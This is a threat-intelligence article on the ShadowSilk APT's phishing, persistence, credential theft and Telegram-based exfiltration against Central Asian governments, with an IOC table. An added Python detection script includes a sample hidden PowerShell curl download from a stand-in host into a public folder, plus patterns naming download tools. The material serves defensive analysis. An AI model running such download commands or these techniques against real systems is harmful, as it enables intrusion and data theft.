Cybersecurity experts discovered an advanced persistent threat (APT) cluster called ShadowSilk in detailed research published by Group-IB. Since at least 2023, this group has been actively breaching government institutions in Central Asia and the Asia-Pacific area.
The group’s operations, ongoing as of July 2025, focus primarily on data exfiltration, leveraging a sophisticated blend of publicly available exploits, penetration-testing utilities, and custom malware.
ShadowSilk’s infrastructure and toolset exhibit significant overlaps with the previously documented YoroTrooper campaigns, including shared PowerShell scripts for payload delivery and Telegram-based command-and-control (C2) mechanisms.
However, expanded analysis revealed a broader victim scope and nuanced operational profiles, prompting Group-IB to classify ShadowSilk as a distinct threat actor.
A joint operation with CERT-KG enabled the acquisition of a server image, exposing the group’s tactics, techniques, and procedures (TTPs), including evidence of Chinese and Russian-speaking operators collaborating in sub-groups.
This bilingual composition suggests potential cross-regional alliances, though the exact nature of their cooperation remains unclear.
Over 35 victims, predominantly in the government sector, have been identified, with attacks involving initial access through phishing emails that deliver password-protected archives containing executables.
These binaries establish persistence via registry modifications and facilitate remote command execution, underscoring the group’s emphasis on stealthy, long-term infiltration.
ShadowSilk’s Bilingual Operations
Further forensic examination of the seized server image highlighted ShadowSilk’s diverse arsenal, which integrates open-source penetration-testing tools like sqlmap, wpscan, fscan, gobuster, and dirsearch for reconnaissance and vulnerability scanning.
The group exploits known vulnerabilities such as CVE-2018-7600 (Drupalgeddon2), CVE-2018-7602, and CVE-2024-27956, alongside frameworks like Metasploit and Cobalt Strike for privilege escalation and lateral movement.
Custom elements include Telegram bots for C2, enabling real-time command issuance, data exfiltration, and traffic obfuscation as legitimate messenger activity.
Screenshots from operators’ workstations revealed Chinese-language interfaces, including tools like Struts2VulsTools and Godzilla webshells, pointing to Chinese-speaking members handling network penetration and internal reconnaissance.
By contrast, Russian-speaking operators appear focused on malware development, evidenced by Russian keyboard layouts, command typos (e.g., “ыскуут -ды” for “screen -ls”), and testing of Cobalt Strike beacons on their own devices.
Shared victim networks, such as those in Uzbek organizations, indicate coordinated efforts between sub-groups, with identical reconnaissance notes appearing in both contexts.
Persistence is maintained through registry keys like HKCU\Software\Microsoft\Windows\CurrentVersion\Run, while credential access involves stealing Chrome password stores and decrypting them using local keys.
Exfiltration scripts, often obfuscated PowerShell code, systematically archive and upload sensitive files (e.g., .docx, .xlsx, .pdf) to domains like pweobmxdlboi[.]com, compressing data into ZIP files for transmission.
The group has also acquired web panels like JRAT and Morf Project from darkweb forums, using them to manage infected devices without developing custom malware builders, thereby reducing operational overhead.
Evolving Campaigns
According to the report, ShadowSilk’s campaigns demonstrate adaptability, with infrastructure refreshes following exposures, such as the January 2025 “Silent Lynx” disclosure that prompted abandonment of old servers.
By June 2025, new Telegram bots and IP addresses emerged, maintaining procedural similarities like modified PowerShell commands for payload deployment (e.g., curl-based downloads to paths like C:\users\public\$$).
A fraction of exfiltrated data has surfaced for sale on darkweb forums, hinting at possible monetization motives beyond espionage.
For defense, organizations should implement robust email filtering to block phishing vectors, enforce strict application controls, and apply patches for exploited CVEs.
Proactive threat hunting, combined with managed extended detection and response (MXDR) solutions, is crucial for detecting anomalies like unusual registry changes or Telegram traffic.
Monitoring darkweb leaks and leveraging threat intelligence platforms can provide early warnings, ensuring resilience against such persistent threats.
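As an added defender-side illustration (not code from the Group-IB report or the page), the following Python sketch applies three of the detection opportunities described above to constructed Sysmon-style events: a Run-key write pointing at a user-writable directory, a PowerShell curl download into C:\users\public, and Telegram API traffic from a process that is not a messenger client. The event field names, the sample records, the placeholder download host and the Telegram client allow-list are all assumptions.

```python
import re
from typing import Dict, Iterable, List, Optional

# Constructed sample events (not taken from the report), in a simplified
# key=value layout resembling Sysmon process (1), network (3) and registry (13) records.
SAMPLE_EVENTS = [
    r'EventID=13 TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater Details="C:\users\public\svc.exe"',
    r'EventID=13 TargetObject=HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive Details="C:\Program Files\OneDrive\OneDrive.exe"',
    r'EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -w hidden curl http://payload-host.example/a.zip -o C:\users\public\a.zip"',
    r'EventID=3 Image=C:\users\public\svc.exe DestinationHostname=api.telegram.org DestinationPort=443',
    r'EventID=3 Image="C:\Program Files\Telegram Desktop\Telegram.exe" DestinationHostname=api.telegram.org DestinationPort=443',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')   # key=value or key="value with spaces"
RUN_KEY = "\\currentversion\\run\\"
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\", "\\temp\\")
DOWNLOAD_CMD = re.compile(r"\b(curl|wget|iwr|invoke-webrequest)\b")
TELEGRAM_API = "api.telegram.org"
KNOWN_TELEGRAM_CLIENTS = ("\\telegram desktop\\telegram.exe",)  # assumed allow-list of legitimate clients

def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value line into a dict; quoted values may contain spaces."""
    return {k: (quoted or bare) for k, quoted, bare in FIELD_RE.findall(line)}

def check_event(ev: Dict[str, str]) -> Optional[str]:
    """Return a finding for one event, or None if it matches no rule."""
    eid = ev.get("EventID")
    image = ev.get("Image", "").lower()
    if eid == "13":  # Run-key persistence whose target binary lives in a user-writable path
        target = ev.get("TargetObject", "").lower()
        details = ev.get("Details", "").lower()
        if RUN_KEY in target and any(d in details for d in USER_WRITABLE):
            return "run-key persistence from user-writable path: " + ev["Details"]
    elif eid == "1":  # PowerShell pulling a payload into a user-writable path
        cmd = ev.get("CommandLine", "").lower()
        if "powershell" in image and DOWNLOAD_CMD.search(cmd) and any(d in cmd for d in USER_WRITABLE):
            return "powershell download to user-writable path: " + ev["CommandLine"]
    elif eid == "3":  # Telegram API traffic from something other than a messenger client
        host = ev.get("DestinationHostname", "").lower()
        if host == TELEGRAM_API and not image.endswith(KNOWN_TELEGRAM_CLIENTS):
            return "telegram api traffic from non-messenger process: " + ev["Image"]
    return None

def scan(lines: Iterable[str]) -> List[str]:
    """Run every rule over every line and collect the findings in input order."""
    return [hit for hit in (check_event(parse_event(line)) for line in lines) if hit]

for finding in scan(SAMPLE_EVENTS):
    print(finding)
```

The legitimate OneDrive Run entry and the real Telegram Desktop connection produce no finding, which is the point of anchoring the rules on path and process context rather than on the registry key or destination alone.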
Indicators of Compromise (IOCs)
Category | Indicator | Description |
---|---|---|
Domain | pweobmxdlboi[.]com | Exfiltration endpoint |
Domain | document[.]hometowncity[.]cloud | Payload delivery |
IP | 141[.]98[.]82[.]198 | Panel hosting |
Hash | 471e1de3e1a7b0506f6492371a687cde4e278ed8 | Malware sample |
Hash | ca12e8975097d1591cda08d095d4af09b05da83f | Malware sample |